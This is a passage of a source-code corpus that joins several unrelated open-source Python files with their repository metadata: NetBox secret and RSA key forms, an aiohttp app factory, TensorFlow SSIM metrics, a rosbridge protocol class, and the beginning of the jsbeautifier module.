FlexibleModelChoiceField, SlugField, StaticSelect2Multiple, TagFilterField,
)
from .constants import *
from .models import Secret, SecretRole, UserKey
def validate_rsa_key(key, is_secret=True):
"""
Validate the format and type of an RSA key.
"""
if key.startswith('ssh-rsa '):
raise forms.ValidationError("OpenSSH line format is not supported. Please ensure that your public is in PEM (base64) format.")
try:
key = RSA.importKey(key)
except ValueError:
raise forms.ValidationError("Invalid RSA key. Please ensure that your key is in PEM (base64) format.")
except Exception as e:
raise forms.ValidationError("Invalid key detected: {}".format(e))
if is_secret and not key.has_private():
raise forms.ValidationError("This looks like a public key. Please provide your private RSA key.")
elif not is_secret and key.has_private():
raise forms.ValidationError("This looks like a private key. Please provide your public RSA key.")
try:
PKCS1_OAEP.new(key)
except Exception:
raise forms.ValidationError("Error validating RSA key. Please ensure that your key supports PKCS#1 OAEP.")
#
# Secret roles
#
class SecretRoleForm(BootstrapMixin, forms.ModelForm):
slug = SlugField()
class Meta:
model = SecretRole
fields = [
'name', 'slug', 'description', 'users', 'groups',
]
widgets = {
'users': StaticSelect2Multiple(),
'groups': StaticSelect2Multiple(),
}
class SecretRoleCSVForm(forms.ModelForm):
slug = SlugField()
class Meta:
model = SecretRole
fields = SecretRole.csv_headers
help_texts = {
'name': 'Name of secret role',
}
#
# Secrets
#
class SecretForm(BootstrapMixin, CustomFieldModelForm):
plaintext = forms.CharField(
max_length=SECRET_PLAINTEXT_MAX_LENGTH,
required=False,
label='Plaintext',
widget=forms.PasswordInput(
attrs={
'class': 'requires-session-key',
}
)
)
plaintext2 = forms.CharField(
max_length=SECRET_PLAINTEXT_MAX_LENGTH,
required=False,
label='Plaintext (verify)',
widget=forms.PasswordInput()
)
role = DynamicModelChoiceField(
queryset=SecretRole.objects.all(),
widget=APISelect(
api_url="/api/secrets/secret-roles/"
)
)
tags = TagField(
required=False
)
class Meta:
model = Secret
fields = [
'role', 'name', 'plaintext', 'plaintext2', 'tags',
]
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# A plaintext value is required when creating a new Secret
if not self.instance.pk:
self.fields['plaintext'].required = True
def clean(self):
# Verify that the provided plaintext values match
if self.cleaned_data['plaintext'] != self.cleaned_data['plaintext2']:
raise forms.ValidationError({
'plaintext2': "The two given plaintext values do not match. Please check your input."
})
class SecretCSVForm(CustomFieldModelCSVForm):
device = FlexibleModelChoiceField(
queryset=Device.objects.all(),
to_field_name='name',
help_text='Device name or ID',
error_messages={
'invalid_choice': 'Device not found.',
}
)
role = forms.ModelChoiceField(
queryset=SecretRole.objects.all(),
to_field_name='name',
help_text='Name of assigned role',
error_messages={
'invalid_choice': 'Invalid secret role.',
}
)
plaintext = forms.CharField(
help_text='Plaintext secret data'
)
class Meta:
model = Secret
fields = Secret.csv_headers
help_texts = {
'name': 'Name or username',
}
def save(self, *args, **kwargs):
s = super().save(*args, **kwargs)
s.plaintext = str(self.cleaned_data['plaintext'])
return s
class SecretBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=Secret.objects.all(),
widget=forms.MultipleHiddenInput()
)
role = DynamicModelChoiceField(
queryset=SecretRole.objects.all(),
required=False,
widget=APISelect(
api_url="/api/secrets/secret-roles/"
)
)
name = forms.CharField(
max_length=100,
required=False
)
class Meta:
nullable_fields = [
'name',
]
class SecretFilterForm(BootstrapMixin, CustomFieldFilterForm):
model = Secret
q = forms.CharField(
required=False,
label='Search'
)
role = DynamicModelMultipleChoiceField(
queryset=SecretRole.objects.all(),
to_field_name='slug',
required=True,
widget=APISelectMultiple(
api_url="/api/secrets/secret-roles/",
value_field="slug",
)
)
tag = TagFilterField(model)
#
# UserKeys
#
class UserKeyForm(BootstrapMixin, forms.ModelForm):
class Meta:
model = UserKey
fields = ['public_key']
help_texts = {
'public_key': "Enter your public RSA key. Keep the private one with you; you'll need it for decryption. "
"Please note that passphrase-protected keys are not supported.",
}
labels = {
'public_key': ''
}
def clean_public_key(self):
key = self.cleaned_data['public_key']
# Validate the RSA key format.
validate_rsa_key(key, is_secret=False)
return key
class ActivateUserKeyForm(forms.Form):
_selected_action = forms.ModelMultipleChoiceField(
queryset=UserKey.objects.all(),
label='User Keys'
)
secret_key = forms.CharField(
widget=forms.Textarea(
attrs={
'class': 'vLargeTextField',
}
),
label='Your private key'
)
| 27.932203 | 134 | 0.622118 | [
"Apache-2.0"
] | Megzo/netbox | netbox/secrets/forms.py | 6,592 | Python |
import uvloop
import asyncio
import jinja2
import aiohttp_jinja2
from aiohttp import web
from quicksets import settings
from app.middlewares import middlewares
from app.views import routes
async def create_app():
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
app = web.Application(middlewares=middlewares)
aiohttp_jinja2.setup(
app, loader=jinja2.FileSystemLoader(settings.TEMPLATES_PATH))
app.add_routes(routes)
return app
if __name__ == '__main__':
app = create_app()
web.run_app(app, host=settings.HOST, port=settings.PORT)
| 24.083333 | 69 | 0.769896 | [
"MIT"
] | ihor-nahuliak/task-23-jul-2019 | app/application.py | 578 | Python |
import tensorflow as tf
import numpy as np
def _tf_fspecial_gauss(size, sigma, ch=1):
"""Function to mimic the 'fspecial' gaussian MATLAB function
"""
x_data, y_data = np.mgrid[-size//2 + 1:size//2 + 1, -size//2 + 1:size//2 + 1]
x_data = np.expand_dims(x_data, axis=-1)
x_data = np.expand_dims(x_data, axis=-1)
y_data = np.expand_dims(y_data, axis=-1)
y_data = np.expand_dims(y_data, axis=-1)
x = tf.constant(x_data, dtype=tf.float32)
y = tf.constant(y_data, dtype=tf.float32)
g = tf.exp(-((x**2 + y**2)/(2.0*sigma**2)))
g = tf.tile(g, [1, 1, ch, 1])
return g / tf.reduce_sum(g)
def tf_ssim(img1, img2, cs_map=False, mean_metric=True, size=11, sigma=0.5):
img1 = tf.image.rgb_to_grayscale(img1)
img2 = tf.image.rgb_to_grayscale(img2)
window = _tf_fspecial_gauss(size, sigma,
ch=img1.get_shape().as_list()[-1]) # window shape [size, size]
K1 = 0.01
K2 = 0.03
L = 1 # depth of image (255 in case the image has a differnt scale)
C1 = (K1*L)**2
C2 = (K2*L)**2
mu1 = tf.nn.conv2d(img1, window, strides=[1, 1, 1, 1], padding='VALID')
mu2 = tf.nn.conv2d(img2, window, strides=[1, 1, 1, 1], padding='VALID')
mu1_sq = mu1*mu1
mu2_sq = mu2*mu2
mu1_mu2 = mu1*mu2
sigma1_sq = tf.nn.conv2d(img1*img1, window, strides=[1, 1, 1, 1],
padding='VALID') - mu1_sq
sigma2_sq = tf.nn.conv2d(img2*img2, window, strides=[1, 1, 1, 1],
padding='VALID') - mu2_sq
sigma12 = tf.nn.conv2d(img1*img2, window, strides=[1, 1, 1, 1],
padding='VALID') - mu1_mu2
if cs_map:
value = (
((2*mu1_mu2 + C1) * (2*sigma12 + C2)) / (
(mu1_sq + mu2_sq + C1) * (sigma1_sq + sigma2_sq + C2)
), (2.0*sigma12 + C2)/(sigma1_sq + sigma2_sq + C2)
)
else:
value = ((2*mu1_mu2 + C1)*(2*sigma12 + C2)) / (
(mu1_sq + mu2_sq + C1) * (sigma1_sq + sigma2_sq + C2))
if mean_metric:
value = tf.reduce_mean(value)
return value
def tf_ms_ssim(img1, img2, mean_metric=True, level=5):
weight = tf.constant([0.0448, 0.2856, 0.3001, 0.2363, 0.1333], dtype=tf.float32)
mssim = []
mcs = []
for l in range(level):
ssim_map, cs_map = tf_ssim(img1, img2, cs_map=True, mean_metric=False)
mssim.append(tf.reduce_mean(ssim_map))
mcs.append(tf.reduce_mean(cs_map))
filtered_im1 = tf.nn.avg_pool(img1, [1, 2, 2, 1], [1, 2, 2, 1], padding='SAME')
filtered_im2 = tf.nn.avg_pool(img2, [1, 2, 2, 1], [1, 2, 2, 1], padding='SAME')
img1 = filtered_im1
img2 = filtered_im2
# list to tensor of dim D+1
mssim = tf.pack(mssim, axis=0)
mcs = tf.pack(mcs, axis=0)
value = (tf.reduce_prod(
mcs[0:level-1]**weight[0:level-1]) * (mssim[level-1]**weight[level-1]))
if mean_metric:
value = tf.reduce_mean(value)
return value
| 35.583333 | 95 | 0.571429 | [
"MIT"
] | 97chenxa/Multiview2Novelview | ssim.py | 2,989 | Python |
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import print_function
from rosbridge_library.protocol import Protocol
from rosbridge_library.capabilities.call_service import CallService
from rosbridge_library.capabilities.advertise import Advertise
from rosbridge_library.capabilities.publish import Publish
from rosbridge_library.capabilities.subscribe import Subscribe
# imports for defragmentation
from rosbridge_library.capabilities.defragmentation import Defragment
# imports for external service_server
from rosbridge_library.capabilities.advertise_service import AdvertiseService
from rosbridge_library.capabilities.service_response import ServiceResponse
from rosbridge_library.capabilities.unadvertise_service import UnadvertiseService
class RosbridgeProtocol(Protocol):
""" Adds the handlers for the rosbridge opcodes """
rosbridge_capabilities = [CallService, Advertise, Publish, Subscribe, Defragment, AdvertiseService, ServiceResponse, UnadvertiseService]
print("registered capabilities (classes):")
for cap in rosbridge_capabilities:
print(" -", str(cap))
parameters = None
def __init__(self, client_id, parameters = None):
self.parameters = parameters
Protocol.__init__(self, client_id)
for capability_class in self.rosbridge_capabilities:
self.add_capability(capability_class)
| 46.666667 | 140 | 0.793537 | [
"BSD-3-Clause"
] | George-Chia/Cloudroid-Swarm | base-image/rosbridge/rosbridge_library/src/rosbridge_library/rosbridge_protocol.py | 2,940 | Python |
from __future__ import print_function
import sys
import os
import getopt
import re
import string
import errno
import six
from jsbeautifier.__version__ import __version__
#
# The MIT License (MIT)
# Copyright (c) 2007-2013 Einar Lielmanis and contributors.
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Originally written by Einar Lielmanis et al.,
# Conversion to python by Einar Lielmanis, [email protected],
# Parsing improvement for brace-less and semicolon-less statements
# by Liam Newman <[email protected]>
# Python is not my native language, feel free to push things around.
#
# Use either from command line (script displays its usage when run
# without any parameters),
#
#
# or, alternatively, use it as a module:
#
# import jsbeautifier
# res = jsbeautifier.beautify('your javascript string')
# res = jsbeautifier.beautify_file('some_file.js')
#
# you may specify some options:
#
# opts = jsbeautifier.default_options()
# opts.indent_size = 2
# res = jsbeautifier.beautify('some javascript', opts)
#
#
# Here are the available options: (read source)
class BeautifierOptions:
def __init__(self):
self.indent_size = 4
self.indent_char = ' '
self.indent_with_tabs = False
self.preserve_newlines = True
self.max_preserve_newlines = 10
self.space_in_paren = False
self.space_in_empty_paren = False
self.e4x = False
self.jslint_happy = False
self.brace_style = 'collapse'
self.keep_array_indentation = False
self.keep_function_indentation = False
self.eval_code = False
self.unescape_strings = False
self.wrap_line_length = 0
self.break_chained_methods = False
def __repr__(self):
return \
"""indent_size = %d
indent_char = [%s]
preserve_newlines = %s
max_preserve_newlines = %d
space_in_paren = %s
jslint_happy = %s
indent_with_tabs = %s
brace_style = %s
keep_array_indentation = %s
eval_code = %s
wrap_line_length = %s
unescape_strings = %s
""" % ( self.indent_size,
self.indent_char,
self.preserve_newlines,
self.max_preserve_newlines,
self.space_in_paren,
self.jslint_happy,
self.indent_with_tabs,
self.brace_style,
self.keep_array_indentation,
self.eval_code,
self.wrap_line_length,
self.unescape_strings,
)
class BeautifierFlags:
def __init__(self, mode):
self.mode = mode
self.parent = None
self.last_text = ''
self.last_word = ''
self.declaration_statement = False
self.declaration_assignment = False
self.in_html_comment = False
self.multiline_frame = False
self.if_block = False
self.else_block = False
self.do_block = False
self.do_while = False
self.in_case = False
self.in_case_statement = False
self.case_body = False
self.indentation_level = 0
self.line_indent_level = 0
self.start_line_index = 0
self.ternary_depth = 0
self.had_comment = False
def apply_base(self, flags_base, added_newline):
next_indent_level = flags_base.indentation_level;
if not added_newline and \
flags_base.line_indent_level > next_indent_level:
next_indent_level = flags_base.line_indent_level;
self.parent = flags_base;
self.last_text = flags_base.last_text
self.last_word = flags_base.last_word
self.indentation_level = next_indent_level
# Using object instead of string to allow for later expansion of info about each line
class OutputLine:
def __init__(self):
self.text = []
class Acorn:
def __init__(self):
# This section of code was translated to python from acorn (javascript).
#
# Acorn was written by Marijn Haverbeke and released under an MIT
# license. The Unicode regexps (for identifiers and whitespace) were
# taken from [Esprima](http://esprima.org) by Ariya Hidayat.
#
# Git repositories for Acorn are available at
#
# http://marijnhaverbeke.nl/git/acorn
# https://github.com/marijnh/acorn.git
# ## Character categories
# Big ugly regular expressions that match characters in the
# whitespace, identifier, and identifier-start categories. These
# are only applied when a character is found to actually have a
# code point above 128.
self.nonASCIIwhitespace = re.compile(six.u("[\u1680\u180e\u2000-\u200a\u202f\u205f\u3000\ufeff]"))
self.nonASCIIidentifierStartChars = six.u("\xaa\xb5\xba\xc0-\xd6\xd8-\xf6\xf8-\u02c1\u02c6-\u02d1\u02e0-\u02e4\u02ec\u02ee\u0370-\u0374\u0376\u0377\u037a-\u037d\u0386\u0388-\u038a\u038c\u038e-\u03a1\u03a3-\u03f5\u03f7-\u0481\u048a-\u0527\u0531-\u0556\u0559\u0561-\u0587\u05d0-\u05ea\u05f0-\u05f2\u0620-\u064a\u066e\u066f\u0671-\u06d3\u06d5\u06e5\u06e6\u06ee\u06ef\u06fa-\u06fc\u06ff\u0710\u0712-\u072f\u074d-\u07a5\u07b1\u07ca-\u07ea\u07f4\u07f5\u07fa\u0800-\u0815\u081a\u0824\u0828\u0840-\u0858\u08a0\u08a2-\u08ac\u0904-\u0939\u093d\u0950\u0958-\u0961\u0971-\u0977\u0979-\u097f\u0985-\u098c\u098f\u0990\u0993-\u09a8\u09aa-\u09b0\u09b2\u09b6-\u09b9\u09bd\u09ce\u09dc\u09dd\u09df-\u09e1\u09f0\u09f1\u0a05-\u0a0a\u0a0f\u0a10\u0a13-\u0a28\u0a2a-\u0a30\u0a32\u0a33\u0a35\u0a36\u0a38\u0a39\u0a59-\u0a5c\u0a5e\u0a72-\u0a74\u0a85-\u0a8d\u0a8f-\u0a91\u0a93-\u0aa8\u0aaa-\u0ab0\u0ab2\u0ab3\u0ab5-\u0ab9\u0abd\u0ad0\u0ae0\u0ae1\u0b05-\u0b0c\u0b0f\u0b10\u0b13-\u0b28\u0b2a-\u0b30\u0b32\u0b33\u0b35-\u0b39\u0b3d\u0b5c\u0b5d\u0b5f-\u0b61\u0b71\u0b83\u0b85-\u0b8a\u0b8e-\u0b90\u0b92-\u0b95\u0b99\u0b9a\u0b9c\u0b9e\u0b9f\u0ba3\u0ba4\u0ba8-\u0baa\u0bae-\u0bb9\u0bd0\u0c05-\u0c0c\u0c0e-\u0c10\u0c12-\u0c28\u0c2a-\u0c33\u0c35-\u0c39\u0c3d\u0c58\u0c59\u0c60\u0c61\u0c85-\u0c8c\u0c8e-\u0c90\u0c92-\u0ca8\u0caa-\u0cb3\u0cb5-\u0cb9\u0cbd\u0cde\u0ce0\u0ce1\u0cf1\u0cf2\u0d05-\u0d0c\u0d0e-\u0d10\u0d12-\u0d3a\u0d3d\u0d4e\u0d60\u0d61\u0d7a-\u0d7f\u0d85-\u0d96\u0d9a-\u0db1\u0db3-\u0dbb\u0dbd\u0dc0-\u0dc6\u0e01-\u0e30\u0e32\u0e33\u0e40-\u0e46\u0e81\u0e82\u0e84\u0e87\u0e88\u0e8a\u0e8d\u0e94-\u0e97\u0e99-\u0e9f\u0ea1-\u0ea3\u0ea5\u0ea7\u0eaa\u0eab\u0ead-\u0eb0\u0eb2\u0eb3\u0ebd\u0ec0-\u0ec4\u0ec6\u0edc-\u0edf\u0f00\u0f40-\u0f47\u0f49-\u0f6c\u0f88-\u0f8c\u1000-\u102a\u103f\u1050-\u1055\u105a-\u105d\u1061\u1065\u1066\u106e-\u1070\u1075-\u1081\u108e\u10a0-\u10c5\u10c7\u10cd\u10d0-\u10fa\u10fc-\u1248\u124a-\u124d\u1250-\u1256\u1258\u125a-\u125d\u1260-\u1288\u128a-\u128d\u1290-\u12b0\u12b2-\u12b5\u12b8-\u12be\u12c0\u12c2-\u12c5\u12c8-\u12d6\u12d8-\u1310\u1312-\u1315\u1318-\u135a\u1380-\u138f\u13a0-\u13f4\u1401-\u166c\u166f-\u167f\u1681-\u169a\u16a0-\u16ea\u16ee-\u16f0\u1700-\u170c\u170e-\u1711\u1720-\u1731\u1740-\u1751\u1760-\u176c\u176e-\u1770\u1780-\u17b3\u17d7\u17dc\u1820-\u1877\u1880-\u18a8\u18aa\u18b0-\u18f5\u1900-\u191c\u1950-\u196d\u1970-\u1974\u1980-\u19ab\u19c1-\u19c7\u1a00-\u1a16\u1a20-\u1a54\u1aa7\u1b05-\u1b33\u1b45-\u1b4b\u1b83-\u1ba0\u1bae\u1baf\u1bba-\u1be5\u1c00-\u1c23\u1c4d-\u1c4f\u1c5a-\u1c7d\u1ce9-\u1cec\u1cee-\u1cf1\u1cf5\u1cf6\u1d00-\u1dbf\u1e00-\u1f15\u1f18-\u1f1d\u1f20-\u1f45\u1f48-\u1f4d\u1f50-\u1f57\u1f59\u1f5b\u1f5d\u1f5f-\u1f7d\u1f80-\u1fb4\u1fb6-\u1fbc\u1fbe\u1fc2-\u1fc4\u1fc6-\u1fcc\u1fd0-\u1fd3\u1fd6-\u1fdb\u1fe0-\u1fec\u1ff2-\u1ff4\u1ff6-\u1ffc\u2071\u207f\u2090-\u209c\u2102\u2107\u210a-\u2113\u2115\u2119-\u211d\u2124\u2126\u2128\u212a-\u212d\u212f-\u2139\u213c-\u213f\u2145-\u2149\u214e\u2160-\u2188\u2c00-\u2c2e\u2c30-\u2c5e\u2c60-\u2ce4\u2ceb-\u2cee\u2cf2\u2cf3\u2d00-\u2d25\u2d27\u2d2d\u2d30-\u2d67\u2d6f\u2d80-\u2d96\u2da0-\u2da6\u2da8-\u2dae\u2db0-\u2db6\u2db8-\u2dbe\u2dc0-\u2dc6\u2dc8-\u2dce\u2dd0-\u2dd6\u2dd8-\u2dde\u2e2f\u3005-\u3007\u3021-\u3029\u3031-\u3035\u3038-\u303c\u3041-\u3096\u309d-\u309f\u30a1-\u30fa\u30fc-\u30ff\u3105-\u312d\u3131-\u318e\u31a0-\u31ba\u31f0-\u31ff\u3400-\u4db5\u4e00-\u9fcc\ua000-\ua48c\ua4d0-\ua4fd\ua500-\ua60c\ua610-\ua61f\ua62a\ua62b\ua640-\ua66e\ua67f-\ua697\ua6a0-\ua6ef\ua717-\ua71f\ua722-\ua788\ua78b-\ua78e\ua790-\ua793\ua7a0-\ua7aa\ua7f8-\ua801\ua803-\ua805\ua807-\ua80a\ua80c-\ua822\ua840-\ua873\ua882-\ua8b3\ua8f2-\ua8f7\ua8fb\ua90a-\ua925\ua930-\ua946\ua960-\ua97c\ua984-\ua9b2\ua9cf\uaa00-\uaa28\uaa40-\uaa42\uaa44-\uaa4b\uaa60-\uaa76\uaa7a\uaa80-\uaaaf\uaab1\uaab5\uaab6\uaab9-\uaabd\uaac0\uaac2\uaadb-\uaadd\uaae0-\uaaea\uaaf2-\uaaf4\uab01-\uab06\uab09-\uab0e\uab11-\uab16\uab20-\uab26\uab28-\uab2e\uabc0-\uabe2\uac00-\ud7a3\ud7b0-\ud7c6\ud7cb-\ud7fb\uf900-\ufa6d\ufa70-\ufad9\ufb00-\ufb06\ufb13-\ufb17\ufb1d\ufb1f-\ufb28\ufb2a-\ufb36\ufb38-\ufb3c\ufb3e\ufb40\ufb41\ufb43\ufb44\ufb46-\ufbb1\ufbd3-\ufd3d\ufd50-\ufd8f\ufd92-\ufdc7\ufdf0-\ufdfb\ufe70-\ufe74\ufe76-\ufefc\uff21-\uff3a\uff41-\uff5a\uff66-\uffbe\uffc2-\uffc7\uffca-\uffcf\uffd2-\uffd7\uffda-\uffdc")
self.nonASCIIidentifierChars = six.u("\u0300-\u036f\u0483-\u0487\u0591-\u05bd\u05bf\u05c1\u05c2\u05c4\u05c5\u05c7\u0610-\u061a\u0620-\u0649\u0672-\u06d3\u06e7-\u06e8\u06fb-\u06fc\u0730-\u074a\u0800-\u0814\u081b-\u0823\u0825-\u0827\u0829-\u082d\u0840-\u0857\u08e4-\u08fe\u0900-\u0903\u093a-\u093c\u093e-\u094f\u0951-\u0957\u0962-\u0963\u0966-\u096f\u0981-\u0983\u09bc\u09be-\u09c4\u09c7\u09c8\u09d7\u09df-\u09e0\u0a01-\u0a03\u0a3c\u0a3e-\u0a42\u0a47\u0a48\u0a4b-\u0a4d\u0a51\u0a66-\u0a71\u0a75\u0a81-\u0a83\u0abc\u0abe-\u0ac5\u0ac7-\u0ac9\u0acb-\u0acd\u0ae2-\u0ae3\u0ae6-\u0aef\u0b01-\u0b03\u0b3c\u0b3e-\u0b44\u0b47\u0b48\u0b4b-\u0b4d\u0b56\u0b57\u0b5f-\u0b60\u0b66-\u0b6f\u0b82\u0bbe-\u0bc2\u0bc6-\u0bc8\u0bca-\u0bcd\u0bd7\u0be6-\u0bef\u0c01-\u0c03\u0c46-\u0c48\u0c4a-\u0c4d\u0c55\u0c56\u0c62-\u0c63\u0c66-\u0c6f\u0c82\u0c83\u0cbc\u0cbe-\u0cc4\u0cc6-\u0cc8\u0cca-\u0ccd\u0cd5\u0cd6\u0ce2-\u0ce3\u0ce6-\u0cef\u0d02\u0d03\u0d46-\u0d48\u0d57\u0d62-\u0d63\u0d66-\u0d6f\u0d82\u0d83\u0dca\u0dcf-\u0dd4\u0dd6\u0dd8-\u0ddf\u0df2\u0df3\u0e34-\u0e3a\u0e40-\u0e45\u0e50-\u0e59\u0eb4-\u0eb9\u0ec8-\u0ecd\u0ed0-\u0ed9\u0f18\u0f19\u0f20-\u0f29\u0f35\u0f37\u0f39\u0f41-\u0f47\u0f71-\u0f84\u0f86-\u0f87\u0f8d-\u0f97\u0f99-\u0fbc\u0fc6\u1000-\u1029\u1040-\u1049\u1067-\u106d\u1071-\u1074\u1082-\u108d\u108f-\u109d\u135d-\u135f\u170e-\u1710\u1720-\u1730\u1740-\u1750\u1772\u1773\u1780-\u17b2\u17dd\u17e0-\u17e9\u180b-\u180d\u1810-\u1819\u1920-\u192b\u1930-\u193b\u1951-\u196d\u19b0-\u19c0\u19c8-\u19c9\u19d0-\u19d9\u1a00-\u1a15\u1a20-\u1a53\u1a60-\u1a7c\u1a7f-\u1a89\u1a90-\u1a99\u1b46-\u1b4b\u1b50-\u1b59\u1b6b-\u1b73\u1bb0-\u1bb9\u1be6-\u1bf3\u1c00-\u1c22\u1c40-\u1c49\u1c5b-\u1c7d\u1cd0-\u1cd2\u1d00-\u1dbe\u1e01-\u1f15\u200c\u200d\u203f\u2040\u2054\u20d0-\u20dc\u20e1\u20e5-\u20f0\u2d81-\u2d96\u2de0-\u2dff\u3021-\u3028\u3099\u309a\ua640-\ua66d\ua674-\ua67d\ua69f\ua6f0-\ua6f1\ua7f8-\ua800\ua806\ua80b\ua823-\ua827\ua880-\ua881\ua8b4-\ua8c4\ua8d0-\ua8d9\ua8f3-\ua8f7\ua900-\ua909\ua926-\ua92d\ua930-\ua945\ua980-\ua983\ua9b3-\ua9c0\uaa00-\uaa27\uaa40-\uaa41\uaa4c-\uaa4d\uaa50-\uaa59\uaa7b\uaae0-\uaae9\uaaf2-\uaaf3\uabc0-\uabe1\uabec\uabed\uabf0-\uabf9\ufb20-\ufb28\ufe00-\ufe0f\ufe20-\ufe26\ufe33\ufe34\ufe4d-\ufe4f\uff10-\uff19\uff3f")
self.nonASCIIidentifierStart = re.compile("[" + self.nonASCIIidentifierStartChars + "]")
self.nonASCIIidentifier = re.compile("[" + self.nonASCIIidentifierStartChars + self.nonASCIIidentifierChars + "]")
# Whether a single character denotes a newline.
self.newline = re.compile(six.u("[\n\r\u2028\u2029]"))
# Matches a whole line break (where CRLF is considered a single
# line break). Used to count lines.
self.lineBreak = re.compile(six.u("\r\n|[\n\r\u2028\u2029]"))
# Test whether a given character code starts an identifier.
def isIdentifierStart(self, code):
if code < 65:
return code == 36
if code < 91:
return True
if code < 97:
return code == 95
if code < 123:
return True;
return code >= 0xaa and self.nonASCIIidentifierStart.match(six.unichr(code)) != None;
# Test whether a given character is part of an identifier.
def isIdentifierChar(self, code):
if code < 48:
return code == 36;
if code < 58:
return True;
if code < 65:
return False;
if code < 91:
return True;
if code < 97:
return code == 95;
if code < 123:
return True;
return code >= 0xaa and self.nonASCIIidentifier.match(six.unichr(code)) != None;
def default_options():
return BeautifierOptions()
def beautify(string, opts = default_options() ):
b = Beautifier()
return b.beautify(string, opts)
def beautify_file(file_name, opts = default_options() ):
if file_name == '-': # stdin
stream = sys.stdin
else:
stream = open(file_name)
return beautify(''.join(stream.readlines()), opts);
def usage(stream=sys.stdout):
print("jsbeautifier.py@" + __version__ + """
Javascript beautifier (http://jsbeautifier.org/)
Usage: jsbeautifier.py [options] <infile>
<infile> can be "-", which means stdin.
<outfile> defaults to stdout
Input options:
-i, --stdin read input from stdin
Output options:
-s, --indent-size=NUMBER indentation size. (default 4).
-c, --indent-char=CHAR character to indent with. (default space).
-t, --indent-with-tabs Indent with tabs, overrides -s and -c
-d, --disable-preserve-newlines do not preserve existing line breaks.
-P, --space-in-paren add padding spaces within paren, ie. f( a, b )
-E, --space-in-empty-paren Add a single space inside empty paren, ie. f( )
-j, --jslint-happy more jslint-compatible output
-b, --brace-style=collapse brace style (collapse, expand, end-expand)
-k, --keep-array-indentation keep array indentation.
-o, --outfile=FILE specify a file to output to (default stdout)
-f, --keep-function-indentation Do not re-indent function bodies defined in var lines.
-x, --unescape-strings Decode printable chars encoded in \\xNN notation.
-X, --e4x Pass E4X xml literals through untouched
-w, --wrap-line-length Attempt to wrap line when it exceeds this length.
NOTE: Line continues until next wrap point is found.
Rarely needed options:
--eval-code evaluate code if a JS interpreter is
installed. May be useful with some obfuscated
script but poses a potential security issue.
-l, --indent-level=NUMBER initial indentation level. (default 0).
-h, --help, --usage prints this help statement.
-v, --version Show the version
""", file=stream)
if stream == sys.stderr:
return 1
else:
return 0
class MODE:
BlockStatement, Statement, ObjectLiteral, ArrayLiteral, \
ForInitializer, Conditional, Expression = range(7)
class Beautifier:
def __init__(self, opts = default_options() ):
self.opts = opts
self.blank_state()
self.acorn = Acorn();
def blank_state(self):
# internal flags
self.flags = None
self.previous_flags = None
self.flag_store = []
self.input_wanted_newline = False
if self.opts.indent_with_tabs:
self.opts.indent_char = "\t"
self.opts.indent_size = 1
self.indent_string = self.opts.indent_char * self.opts.indent_size
self.preindent_string = ''
self.last_type = 'TK_START_BLOCK' # last token type
self.last_last_text = '' # pre-last token text
self.input = None
self.output_lines = [ OutputLine() ]
self.output_space_before_token = False
self.whitespace_before_token = []
self.whitespace = ["\n", "\r", "\t", " "]
self.wordchar = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_$'
self.digits = '0123456789'
self.punct = '+ - * / % & ++ -- = += -= *= /= %= == === != !== > < >= <= >> << >>> >>>= >>= <<= && &= | || ! ~ , : ? ^ ^= |= :: =>'
self.punct += ' <?= <? ?> <%= <% %>'
self.punct = self.punct.split(' ')
# Words which always should start on a new line
self.line_starters = 'continue,try,throw,return,var,let,const,if,switch,case,default,for,while,break,function,yield'.split(',')
self.reserved_words = self.line_starters + ['do', 'in', 'else', 'get', 'set', 'new', 'catch', 'finally', 'typeof'];
self.set_mode(MODE.BlockStatement)
self.parser_pos = 0
def beautify(self, s, opts = None ):
